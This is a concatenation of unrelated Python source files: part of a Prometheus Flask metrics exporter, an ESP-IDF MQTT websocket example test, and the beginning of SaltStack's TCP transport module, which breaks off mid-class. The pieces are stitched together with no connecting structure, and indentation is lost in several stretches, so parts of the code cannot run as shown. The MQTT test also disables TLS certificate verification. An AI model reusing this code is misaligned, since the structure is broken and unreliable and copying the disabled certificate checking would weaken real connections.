        # Normalise each label spec to a one-argument callable receiving the
        # response: plain values are wrapped; zero-arg callables are adapted.
        if not callable(f):
            return lambda x: f
        # NOTE(review): inspect.getargspec is deprecated (removed in
        # Python 3.11); presumably this targets older Pythons -- confirm
        # before upgrading the runtime.
        if inspect.getargspec(f).args:
            return lambda x: f(x)
        else:
            return lambda x: f()

    label_generator = tuple(
        (key, label_value(call))
        for key, call in labels.items()
    ) if labels else tuple()

    def get_metric(response):
        # Resolve the child metric for this response's label values,
        # or the parent metric itself when there are no labels.
        if label_names:
            return parent_metric.labels(
                **{key: call(response) for key, call in label_generator}
            )
        else:
            return parent_metric

    def decorator(f):
        @functools.wraps(f)
        def func(*args, **kwargs):
            if before:
                # `before` hooks (e.g. Gauge.inc) cannot see the response,
                # so the metric is resolved with response=None up front.
                metric = get_metric(None)
                before(metric)
            else:
                metric = None

            start_time = default_timer()
            try:
                response = f(*args, **kwargs)
            except HTTPException as ex:
                # HTTP errors double as responses for label extraction.
                response = ex
            except Exception as ex:
                response = make_response('Exception: %s' % ex, 500)

            total_time = max(default_timer() - start_time, 0)
            if not metric:
                response_for_metric = response
                if not isinstance(response, Response):
                    if request.endpoint == f.__name__:
                        # we are in a request handler method
                        response_for_metric = make_response(response)
                metric = get_metric(response_for_metric)

            metric_call(metric, time=total_time)
            return response

        return func

    return decorator
@staticmethod
def do_not_track():
    """
    Decorator to skip the default metrics collection for the method.

    *Note*: explicit metrics decorators will still collect the data
    """
    def decorator(f):
        @functools.wraps(f)
        def wrapper(*args, **kwargs):
            # Flag the current request so the default exporters ignore it.
            request.prom_do_not_track = True
            return f(*args, **kwargs)
        return wrapper
    return decorator
def info(self, name, description, labelnames=None, labelvalues=None, **labels):
    """
    Report any information as a Prometheus metric.
    This will create a `Gauge` with the initial value of 1.

    The easiest way to use it is:
        metrics = PrometheusMetrics(app)
        metrics.info(
            'app_info', 'Application info',
            version='1.0', major=1, minor=0
        )
    If the order of the labels matters:
        metrics = PrometheusMetrics(app)
        metrics.info(
            'app_info', 'Application info',
            ('version', 'major', 'minor'),
            ('1.0', 1, 0)
        )

    :param name: the name of the metric
    :param description: the description of the metric
    :param labelnames: the names of the labels
    :param labelvalues: the values of the labels
    :param labels: the names and values of the labels
    :return: the newly created `Gauge` metric
    """
    if labels and labelnames:
        raise ValueError(
            'Cannot have labels defined as `dict` '
            'and collections of names and values'
        )

    if labelnames is None:
        # Default to the keyword labels (possibly none at all): passing
        # `None` through to `Gauge` as the label names would fail, since
        # it expects an iterable of names.
        labelnames = tuple(labels.keys())
    elif labelvalues:
        # Pair up positional names and values into the labels dict.
        for idx, label_name in enumerate(labelnames):
            labels[label_name] = labelvalues[idx]

    gauge = Gauge(
        name, description, labelnames,
        registry=self.registry
    )

    if labels:
        gauge = gauge.labels(**labels)

    gauge.set(1)
    return gauge
# Package version string, exposed for consumers and packaging tools.
__version__ = '0.1.2'
|
mqtt_wss_example_test.py | from __future__ import unicode_literals
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import ssl
import paho.mqtt.client as mqtt
from threading import Thread, Event
try:
import IDF
except ImportError:
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
# Set by on_connect() once the local paho client gets CONNACK from the broker.
event_client_connected = Event()
# Set by the test to stop the background mqtt_client_task() loop thread.
event_stop_client = Event()
# Set by on_message() when the expected "data" payload arrives on /topic/qos0.
event_client_received_correct = Event()
# Human-readable log of every received message, used in failure reporting.
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
    """Connect callback: flag the connection event and subscribe to the test topic."""
    result = str(rc)
    print("Connected with result code " + result)
    event_client_connected.set()
    client.subscribe("/topic/qos0")
def mqtt_client_task(client):
    """Drive the paho client's network loop until the stop event is set."""
    while True:
        if event_stop_client.is_set():
            break
        client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
    """Message callback: answer the first expected payload and record everything."""
    global message_log
    data = msg.payload.decode()
    is_expected_payload = (data == "data")
    if is_expected_payload and not event_client_received_correct.is_set():
        client.publish("/topic/qos0", "data_to_esp32")
    if is_expected_payload and msg.topic == "/topic/qos0":
        event_client_received_correct.set()
    message_log += "Received data:" + msg.topic + " " + data + "\n"
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_wss(env, extra_data):
    """
    steps: |
      1. join AP and connects to wss broker
      2. Test connects a client to the same broker
      3. Test evaluates it received correct qos0 message
      4. Test ESP32 client received correct qos0 message
    """
    # NOTE: the steps description above was previously placed after the first
    # two assignments, so it was never picked up as the function docstring.
    broker_url = ""
    broker_port = 0
    dut1 = env.get_dut("mqtt_websocket_secure", "examples/protocols/mqtt/wss")
    # check and log bin size
    binary_file = os.path.join(dut1.app.binary_path, "mqtt_websocket_secure.bin")
    bin_size = os.path.getsize(binary_file)
    IDF.log_performance("mqtt_websocket_secure_bin_size", "{}KB".format(bin_size // 1024))
    IDF.check_performance("mqtt_websocket_secure_size", bin_size // 1024)
    # Look for host:port in sdkconfig
    try:
        value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
        broker_url = value.group(1)
        broker_port = int(value.group(2))
    except Exception:
        print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
        raise
    client = None
    # 1. Test connects to a broker
    try:
        client = mqtt.Client(transport="websockets")
        client.on_connect = on_connect
        client.on_message = on_message
        # Certificate checking is disabled on purpose: this only validates
        # the wss transport, not the broker's identity.
        client.tls_set(None,
                       None,
                       None, cert_reqs=ssl.CERT_NONE, tls_version=ssl.PROTOCOL_TLSv1_2, ciphers=None)
        print("Connecting...")
        client.connect(broker_url, broker_port, 60)
    except Exception:
        print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
        raise
    # Starting a py-client in a separate thread
    thread1 = Thread(target=mqtt_client_task, args=(client,))
    thread1.start()
    try:
        print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
        if not event_client_connected.wait(timeout=30):
            raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
        dut1.start_app()
        try:
            ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
            print("Connected to AP with IP: {}".format(ip_address))
        except DUT.ExpectTimeout:
            print('ENV_TEST_FAILURE: Cannot connect to AP')
            raise
        print("Checking py-client received msg published from esp...")
        if not event_client_received_correct.wait(timeout=30):
            raise ValueError('Wrong data received, msg log: {}'.format(message_log))
        print("Checking esp-client received msg published from py-client...")
        dut1.expect(re.compile(r"DATA=data_to_esp32"), timeout=30)
    finally:
        # Always stop and join the background client thread, even on failure.
        event_stop_client.set()
        thread1.join()
if __name__ == '__main__':
    # Standalone entry point outside the CI runner.
    # NOTE(review): called with no arguments although the function signature
    # is (env, extra_data) -- presumably the idf_example_test decorator
    # supplies them when run this way; confirm against tiny-test-fw.
    test_examples_protocol_mqtt_wss()
|
tcp.py | # -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import msgpack
import socket
import os
import weakref
import time
import traceback
import errno
# Import Salt Libs
import salt.crypt
import salt.utils.async
import salt.utils.event
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import errno
import tornado.util
from salt.utils.process import SignalHandlingMultiprocessingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
'''
Ensure that TCP keepalives are set for the socket.
'''
if hasattr(socket, 'SO_KEEPALIVE'):
if opts.get('tcp_keepalive', False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, 'SOL_TCP'):
if hasattr(socket, 'TCP_KEEPIDLE'):
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE,
int(tcp_keepalive_idle))
if hasattr(socket, 'TCP_KEEPCNT'):
tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT,
int(tcp_keepalive_cnt))
if hasattr(socket, 'TCP_KEEPINTVL'):
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl))
if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
1, int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000)))
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingMultiprocessingProcess):
    '''
    Raw TCP server which runs in its own process and will listen
    for incoming connections. Each incoming connection will be
    sent via multiprocessing queue to the workers.
    Since the queue is shared amongst workers, only one worker will
    handle a given connection.
    '''
    # TODO: opts!
    # Based on default used in tornado.netutil.bind_sockets()
    backlog = 128

    def __init__(self, opts, socket_queue, log_queue=None):
        '''
        :param opts: salt config dict; 'interface' and 'ret_port' are read
            when binding the listening socket in run()
        :param socket_queue: multiprocessing queue shared with the workers
        :param log_queue: optional queue for multiprocess-safe logging
        '''
        super(LoadBalancerServer, self).__init__(log_queue=log_queue)
        self.opts = opts
        self.socket_queue = socket_queue
        # Listening socket; created lazily in run()
        self._socket = None

    # __setstate__ and __getstate__ are only used on Windows.
    # We do this so that __init__ will be invoked on Windows in the child
    # process so that a register_after_fork() equivalent will work on
    # Windows.
    def __setstate__(self, state):
        self._is_child = True
        self.__init__(
            state['opts'],
            state['socket_queue'],
            log_queue=state['log_queue']
        )

    def __getstate__(self):
        return {'opts': self.opts,
                'socket_queue': self.socket_queue,
                'log_queue': self.log_queue}

    def close(self):
        # Shut down and release the listening socket, if one was bound.
        if self._socket is not None:
            self._socket.shutdown(socket.SHUT_RDWR)
            self._socket.close()
            self._socket = None

    def __del__(self):
        # Best-effort cleanup on garbage collection.
        self.close()

    def run(self):
        '''
        Start the load balancer
        '''
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        _set_tcp_keepalive(self._socket, self.opts)
        self._socket.setblocking(1)
        self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
        self._socket.listen(self.backlog)

        while True:
            try:
                # Wait for a connection to occur since the socket is
                # blocking.
                connection, address = self._socket.accept()
                # Wait for a free slot to be available to put
                # the connection into.
                # Sockets are picklable on Windows in Python 3.
                self.socket_queue.put((connection, address), True, None)
            except socket.error as e:
                # ECONNABORTED indicates that there was a connection
                # but it was closed while still in the accept queue.
                # (observed on FreeBSD).
                if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
                    continue
                raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
    '''
    Encapsulate sending routines to tcp.
    Note: this class returns a singleton
    '''
    # This class is only a singleton per minion/master pair
    # mapping of io_loop -> {key -> channel}
    instance_map = weakref.WeakKeyDictionary()

    def __new__(cls, opts, **kwargs):
        '''
        Only create one instance of channel per __key()
        '''
        # do we have any mapping for this io_loop
        io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
        if io_loop not in cls.instance_map:
            cls.instance_map[io_loop] = weakref.WeakValueDictionary()
        loop_instance_map = cls.instance_map[io_loop]

        key = cls.__key(opts, **kwargs)
        obj = loop_instance_map.get(key)
        if obj is None:
            log.debug('Initializing new AsyncTCPReqChannel for %s', key)
            # we need to make a local variable for this, as we are going to store
            # it in a WeakValueDictionary-- which will remove the item if no one
            # references it-- this forces a reference while we return to the caller
            obj = object.__new__(cls)
            obj.__singleton_init__(opts, **kwargs)
            loop_instance_map[key] = obj
        else:
            log.debug('Re-using AsyncTCPReqChannel for %s', key)
        return obj

    @classmethod
    def __key(cls, opts, **kwargs):
        # Channels sharing all four of these values share one instance.
        if 'master_uri' in kwargs:
            opts['master_uri'] = kwargs['master_uri']
        return (opts['pki_dir'],  # where the keys are stored
                opts['id'],  # minion ID
                opts['master_uri'],
                kwargs.get('crypt', 'aes'),  # TODO: use the same channel for crypt
                )

    # has to remain empty for singletons, since __init__ will *always* be called
    def __init__(self, opts, **kwargs):
        pass

    # an init for the singleton instance to call
    def __singleton_init__(self, opts, **kwargs):
        self.opts = dict(opts)
        self.serial = salt.payload.Serial(self.opts)

        # crypt defaults to 'aes'
        self.crypt = kwargs.get('crypt', 'aes')

        self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()

        if self.crypt != 'clear':
            self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)

        resolver = kwargs.get('resolver')

        # Derive the (host, port) of the master from its URI.
        parse = urlparse.urlparse(self.opts['master_uri'])
        master_host, master_port = parse.netloc.rsplit(':', 1)
        self.master_addr = (master_host, int(master_port))
        self._closing = False
        self.message_client = SaltMessageClientPool(self.opts,
                                                    args=(self.opts, master_host, int(master_port),),
                                                    kwargs={'io_loop': self.io_loop, 'resolver': resolver,
                                                            'source_ip': self.opts.get('source_ip'),
                                                            'source_port': self.opts.get('source_ret_port')})

    def close(self):
        # Idempotent teardown of the pooled message clients.
        if self._closing:
            return
        self._closing = True
        self.message_client.close()

    def __del__(self):
        # Best-effort cleanup on garbage collection.
        self.close()

    def _package_load(self, load):
        # Envelope format the master expects: crypt mode plus the payload.
        return {
            'enc': self.crypt,
            'load': load,
        }

    @tornado.gen.coroutine
    def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
        '''
        Send an encrypted load and decrypt the reply entry ``ret[dictkey]``
        with the AES key the master returns (RSA-unwrapped via PKCS1_OAEP).
        NOTE(review): unlike _crypted_transfer, no retry on
        AuthenticationError here; `tries` is unused -- confirm intent.
        '''
        if not self.auth.authenticated:
            yield self.auth.authenticate()
        ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
        key = self.auth.get_keys()
        cipher = PKCS1_OAEP.new(key)
        aes = cipher.decrypt(ret['key'])
        pcrypt = salt.crypt.Crypticle(self.opts, aes)
        data = pcrypt.loads(ret[dictkey])
        if six.PY3:
            data = salt.transport.frame.decode_embedded_strs(data)
        raise tornado.gen.Return(data)

    @tornado.gen.coroutine
    def _crypted_transfer(self, load, tries=3, timeout=60):
        '''
        In case of authentication errors, try to renegotiate authentication
        and retry the method.
        Indeed, we can fail too early in case of a master restart during a
        minion state execution call
        '''
        @tornado.gen.coroutine
        def _do_transfer():
            data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
                                                  timeout=timeout,
                                                  )
            # we may not have always data
            # as for example for saltcall ret submission, this is a blind
            # communication, we do not subscribe to return events, we just
            # upload the results to the master
            if data:
                data = self.auth.crypticle.loads(data)
                if six.PY3:
                    data = salt.transport.frame.decode_embedded_strs(data)
            raise tornado.gen.Return(data)

        if not self.auth.authenticated:
            yield self.auth.authenticate()
        try:
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)
        except salt.crypt.AuthenticationError:
            # Session key may be stale (e.g. master restart): re-auth once.
            yield self.auth.authenticate()
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)

    @tornado.gen.coroutine
    def _uncrypted_transfer(self, load, tries=3, timeout=60):
        # Plain-text path used when crypt == 'clear' (e.g. key exchange).
        ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
        raise tornado.gen.Return(ret)

    @tornado.gen.coroutine
    def send(self, load, tries=3, timeout=60, raw=False):
        '''
        Send a request, return a future which will complete when we send the message
        '''
        try:
            if self.crypt == 'clear':
                ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
            else:
                ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
        except tornado.iostream.StreamClosedError:
            # Convert to 'SaltClientError' so that clients can handle this
            # exception more appropriately.
            raise SaltClientError('Connection to master lost')
        raise tornado.gen.Return(ret)
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
    '''
    Minion-side publish channel over TCP: connects to the master's publish
    port and hands decoded publish payloads to a registered callback.
    '''
    def __init__(self,
                 opts,
                 **kwargs):
        self.opts = opts
        self.serial = salt.payload.Serial(self.opts)

        # crypt defaults to 'aes'
        self.crypt = kwargs.get('crypt', 'aes')
        self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
        self.connected = False
        self._closing = False
        self._reconnected = False
        # Local event bus used to announce master (dis)connection.
        self.event = salt.utils.event.get_event(
            'minion',
            opts=self.opts,
            listen=False
        )

    def close(self):
        # Idempotent: close the message client if connect() ever created one.
        if self._closing:
            return
        self._closing = True
        if hasattr(self, 'message_client'):
            self.message_client.close()

    def __del__(self):
        # Best-effort cleanup on garbage collection.
        self.close()

    def _package_load(self, load):
        # Envelope format the master expects: crypt mode plus the payload.
        return {
            'enc': self.crypt,
            'load': load,
        }

    @tornado.gen.coroutine
    def send_id(self, tok, force_auth):
        '''
        Send the minion id to the master so that the master may better
        track the connection state of the minion.
        In case of authentication errors, try to renegotiate authentication
        and retry the method.
        '''
        load = {'id': self.opts['id'], 'tok': tok}

        @tornado.gen.coroutine
        def _do_transfer():
            msg = self._package_load(self.auth.crypticle.dumps(load))
            package = salt.transport.frame.frame_msg(msg, header=None)
            yield self.message_client.write_to_stream(package)
            raise tornado.gen.Return(True)

        if force_auth or not self.auth.authenticated:
            count = 0
            # tcp_authentication_retries < 0 means retry forever.
            while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
                try:
                    yield self.auth.authenticate()
                    break
                except SaltClientError as exc:
                    log.debug(exc)
                    count += 1
        try:
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)
        except salt.crypt.AuthenticationError:
            # Stale session key: re-auth once and retry.
            yield self.auth.authenticate()
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)

    @tornado.gen.coroutine
    def connect_callback(self, result):
        '''
        Invoked by the message client each time the TCP connection to the
        master's publish port is (re)established.
        '''
        if self._closing:
            return
        # Force re-auth on reconnect since the master
        # may have been restarted
        yield self.send_id(self.tok, self._reconnected)
        self.connected = True
        self.event.fire_event(
            {'master': self.opts['master']},
            '__master_connected'
        )
        if self._reconnected:
            # On reconnects, fire a master event to notify that the minion is
            # available.
            if self.opts.get('__role') == 'syndic':
                data = 'Syndic {0} started at {1}'.format(
                    self.opts['id'],
                    time.asctime()
                )
                tag = salt.utils.event.tagify(
                    [self.opts['id'], 'start'],
                    'syndic'
                )
            else:
                data = 'Minion {0} started at {1}'.format(
                    self.opts['id'],
                    time.asctime()
                )
                tag = salt.utils.event.tagify(
                    [self.opts['id'], 'start'],
                    'minion'
                )
            load = {'id': self.opts['id'],
                    'cmd': '_minion_event',
                    'pretag': None,
                    'tok': self.tok,
                    'data': data,
                    'tag': tag}
            # Synchronous request channel just for this one notification.
            req_channel = salt.utils.async.SyncWrapper(
                AsyncTCPReqChannel, (self.opts,)
            )
            try:
                req_channel.send(load, timeout=60)
            except salt.exceptions.SaltReqTimeoutError:
                log.info('fire_master failed: master could not be contacted. Request timed out.')
            except Exception:
                log.info('fire_master failed: %s', traceback.format_exc())
        else:
            # First successful connect: subsequent calls are reconnects.
            self._reconnected = True

    def disconnect_callback(self):
        # Invoked by the message client when the connection drops.
        if self._closing:
            return
        self.connected = False
        self.event.fire_event(
            {'master': self.opts['master']},
            '__master_disconnected'
        )

    @tornado.gen.coroutine
    def connect(self):
        '''
        Authenticate with the master and open the pooled message client
        against the master's publish port.
        '''
        try:
            self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
            self.tok = self.auth.gen_token('salt')
            if not self.auth.authenticated:
                yield self.auth.authenticate()
            if self.auth.authenticated:
                self.message_client = SaltMessageClientPool(
                    self.opts,
                    args=(self.opts, self.opts['master_ip'], int(self.auth.creds['publish_port']),),
                    kwargs={'io_loop': self.io_loop,
                            'connect_callback': self.connect_callback,
                            'disconnect_callback': self.disconnect_callback,
                            'source_ip': self.opts.get('source_ip'),
                            'source_port': self.opts.get('source_publish_port')})
                yield self.message_client.connect()  # wait for the client to be connected
                self.connected = True
        # TODO: better exception handling...
        except KeyboardInterrupt:
            raise
        except Exception as exc:
            if '-|RETRY|-' not in six.text_type(exc):
                raise SaltClientError('Unable to sign_in to master: {0}'.format(exc))  # TODO: better error message

    def on_recv(self, callback):
        '''
        Register an on_recv callback
        '''
        if callback is None:
            # Passing None clears the callback on the message client.
            return self.message_client.on_recv(callback)

        @tornado.gen.coroutine
        def wrap_callback(body):
            if not isinstance(body, dict):
                # TODO: For some reason we need to decode here for things
                # to work. Fix this.
                body = msgpack.loads(body)
                if six.PY3:
                    body = salt.transport.frame.decode_embedded_strs(body)
            ret = yield self._decode_payload(body)
            callback(ret)
        return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
    '''
    Master-side request server channel: binds the TCP return port and
    dispatches framed msgpack requests to the payload handler.
    '''
    # TODO: opts!
    backlog = 5

    def __init__(self, opts):
        salt.transport.server.ReqServerChannel.__init__(self, opts)
        # Listening socket; bound in pre_fork()/post_fork()
        self._socket = None

    @property
    def socket(self):
        return self._socket

    def close(self):
        '''
        Shut down and release the listening socket, tolerating sockets
        that are already disconnected.
        '''
        if self._socket is not None:
            try:
                self._socket.shutdown(socket.SHUT_RDWR)
            except socket.error as exc:
                if exc.errno == errno.ENOTCONN:
                    # We may try to shutdown a socket which is already disconnected.
                    # Ignore this condition and continue.
                    pass
                else:
                    raise exc
            self._socket.close()
            self._socket = None

    def __del__(self):
        # Best-effort cleanup on garbage collection.
        self.close()

    def pre_fork(self, process_manager):
        '''
        Pre-fork we need to create the zmq router device
        '''
        salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
        if USE_LOAD_BALANCER:
            self.socket_queue = multiprocessing.Queue()
            process_manager.add_process(
                LoadBalancerServer, args=(self.opts, self.socket_queue)
            )
        elif not salt.utils.platform.is_windows():
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            _set_tcp_keepalive(self._socket, self.opts)
            self._socket.setblocking(0)
            self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))

    def post_fork(self, payload_handler, io_loop):
        '''
        After forking we need to create all of the local sockets to listen to the
        router

        payload_handler: function to call with your payloads
        '''
        self.payload_handler = payload_handler
        self.io_loop = io_loop
        self.serial = salt.payload.Serial(self.opts)
        if USE_LOAD_BALANCER:
            self.req_server = LoadBalancerWorker(self.socket_queue,
                                                 self.handle_message,
                                                 io_loop=self.io_loop,
                                                 ssl_options=self.opts.get('ssl'))
        else:
            if salt.utils.platform.is_windows():
                # On Windows the socket could not be created pre-fork.
                self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                _set_tcp_keepalive(self._socket, self.opts)
                self._socket.setblocking(0)
                self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
            self.req_server = SaltMessageServer(self.handle_message,
                                                io_loop=self.io_loop,
                                                ssl_options=self.opts.get('ssl'))
            self.req_server.add_socket(self._socket)
            self._socket.listen(self.backlog)
        salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)

    @tornado.gen.coroutine
    def handle_message(self, stream, header, payload):
        '''
        Handle incoming messages from underylying tcp streams
        '''
        try:
            try:
                payload = self._decode_payload(payload)
            except Exception:
                stream.write(salt.transport.frame.frame_msg('bad load', header=header))
                raise tornado.gen.Return()

            # TODO helper functions to normalize payload?
            if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
                yield stream.write(salt.transport.frame.frame_msg(
                    'payload and load must be a dict', header=header))
                raise tornado.gen.Return()

            try:
                id_ = payload['load'].get('id', '')
                if '\0' in id_:
                    log.error('Payload contains an id with a null byte: %s', payload)
                    # BUG FIX: tornado IOStream has no send() method; the
                    # previous stream.send(...) raised AttributeError instead
                    # of replying to the minion. Use write().
                    stream.write(self.serial.dumps('bad load: id contains a null byte'))
                    raise tornado.gen.Return()
            except TypeError:
                log.error('Payload contains non-string id: %s', payload)
                # BUG FIX: same send() -> write() fix as above.
                stream.write(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
                raise tornado.gen.Return()

            # intercept the "_auth" commands, since the main daemon shouldn't know
            # anything about our key auth
            if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
                yield stream.write(salt.transport.frame.frame_msg(
                    self._auth(payload['load']), header=header))
                raise tornado.gen.Return()

            # TODO: test
            try:
                ret, req_opts = yield self.payload_handler(payload)
            except Exception as e:
                # always attempt to return an error to the minion
                # NOTE(review): writing a text str to an IOStream fails on
                # Python 3 (bytes expected) -- confirm and frame this reply.
                stream.write('Some exception handling minion payload')
                log.error('Some exception handling a payload from minion', exc_info=True)
                stream.close()
                raise tornado.gen.Return()

            req_fun = req_opts.get('fun', 'send')
            if req_fun == 'send_clear':
                stream.write(salt.transport.frame.frame_msg(ret, header=header))
            elif req_fun == 'send':
                stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
            elif req_fun == 'send_private':
                stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
                                                                                  req_opts['key'],
                                                                                  req_opts['tgt'],
                                                                                  ), header=header))
            else:
                log.error('Unknown req_fun %s', req_fun)
                # always attempt to return an error to the minion
                stream.write('Server-side exception handling payload')
                stream.close()
        except tornado.gen.Return:
            raise
        except tornado.iostream.StreamClosedError:
            # Stream was closed. This could happen if the remote side
            # closed the connection on its end (eg in a timeout or shutdown
            # situation).
            log.error('Connection was unexpectedly closed', exc_info=True)
        except Exception as exc:  # pylint: disable=broad-except
            # Absorb any other exceptions
            log.error('Unexpected exception occurred: %s', exc, exc_info=True)

        raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
    '''
    Raw TCP server which will receive all of the TCP streams and re-assemble
    messages that are sent through to us
    '''
    def __init__(self, message_handler, *args, **kwargs):
        super(SaltMessageServer, self).__init__(*args, **kwargs)

        # (stream, address) pairs for every currently connected client
        self.clients = []
        self.message_handler = message_handler

    @tornado.gen.coroutine
    def handle_stream(self, stream, address):
        '''
        Handle incoming streams and add messages to the incoming queue
        '''
        log.trace('Req client %s connected', address)
        self.clients.append((stream, address))
        unpacker = msgpack.Unpacker()
        try:
            while True:
                wire_bytes = yield stream.read_bytes(4096, partial=True)
                unpacker.feed(wire_bytes)
                for framed_msg in unpacker:
                    if six.PY3:
                        framed_msg = salt.transport.frame.decode_embedded_strs(
                            framed_msg
                        )
                    header = framed_msg['head']
                    self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
        except tornado.iostream.StreamClosedError:
            log.trace('req client disconnected %s', address)
            self.clients.remove((stream, address))
        except Exception as e:
            log.trace('other master-side exception: %s', e)
            self.clients.remove((stream, address))
            stream.close()

    def shutdown(self):
        '''
        Shutdown the whole server
        '''
        # BUG FIX: iterate over a snapshot. Removing items from
        # self.clients while iterating it skipped every other client,
        # leaving half of the streams open.
        for item in list(self.clients):
            client, address = item
            client.close()
            self.clients.remove(item)
if USE_LOAD_BALANCER:
    class LoadBalancerWorker(SaltMessageServer):
        '''
        This will receive TCP connections from 'LoadBalancerServer' via
